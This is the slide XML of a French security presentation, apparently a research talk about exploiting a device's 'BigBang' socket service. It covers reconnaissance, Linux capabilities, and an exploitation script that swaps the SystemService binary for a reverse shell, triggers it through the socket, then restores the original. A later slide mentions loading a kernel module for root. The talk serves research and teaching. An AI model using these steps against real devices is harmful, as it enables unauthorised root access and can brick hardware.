        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{997DBB65-3A1E-975A-1655-90D4367494F2}"/>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1" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031A4651-F226-9C8A-BE8D-E081CF69C0E0}"/>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err="1"/>
              <a:t>BigBang</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264170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767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Titre 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DADB2DA6-36A1-562A-1E42-C78B82C63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812" y="1521470"/>
            <a:ext cx="3384376" cy="2594688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2515659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A985A4B-B57F-5364-B4F1-84C99BC885CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{037FAF49-BC2E-62E3-36D8-EB55E5BB49B6}"/>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FDE4C311-C8B1-8767-9138-959C4CBE5CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Capabilities</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18FC5649-F14E-6DDB-393B-06B964AFEAA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1592721"/>
            <a:ext cx="8509659" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>CAP_SYS_ADMIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform a range of system administration operations including: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quotactl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2), mount(2), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>umount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pivot_root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>swapon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>swapoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sethostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setdomainname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>CAP_DAC_OVERRIDE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypass file read, write, and execute permission checks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>CAP_SYS_MODULE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load and unload kernel modules (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init_module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>delete_module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2));</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97BE09AD-711C-16B6-4267-194C2AF40C92}"/>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0" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3487EB5D-C47A-712E-6EFF-CC4C587CF681}"/>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err="1"/>
              <a:t>BigBang</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2335275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8DDCF08-6E11-E9D0-F274-0CD3A3157EB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FCE5DB-D070-548C-382D-F835BF28FC23}"/>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A6C9CEB4-BF33-C57D-3AE2-D1CCB629C109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC5AE47-F81B-D59B-B4CD-67FCCCA3DC09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450199" y="1249961"/>
            <a:ext cx="8509659" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Remplacer temporairement le binaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>SystemService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> par un reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lancer le binaire via la socket bigbang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>S’assurer de remettre le binaire original après exécution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>sinon brique</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5158F424-109C-8208-7170-C6277C91EDB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450199" y="2891999"/>
            <a:ext cx="7646987" cy="1708160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#!/bin/sh</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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0" err="1">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rw</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tvservice</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>777</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tmp</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br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mv</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SystemService.backup</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mv</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tmp</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>777</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br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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tmp</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bigbangsendmsg</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mv</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SystemService.backup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>md5sum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80400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applications</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80400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SystemService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1050" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B295EEBF-D144-72A9-1D20-4F610345E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808" y="2013140"/>
            <a:ext cx="3960440" cy="2226753"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3948A490-38A1-66AE-96F9-6A582A714DAD}"/>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3" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2298190-D303-8BA4-FD33-A3358D06DBAD}"/>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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19930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1C42BF7-98CE-6B62-7B1A-D3F974B6FE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E042D5F-D8C2-47CE-6CA8-292ADFFA27EB}"/>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DA5E5D79-8FCA-F029-82AF-26A867BEAA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Post-exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{798CE641-42CC-0A32-940D-FC523F9156C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1279088"/>
            <a:ext cx="8509659" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Insérer un module kernel pour obtenir les droits root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Problème de version de kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5916666-34EF-604F-A5E0-B054A3E8B21D}"/>
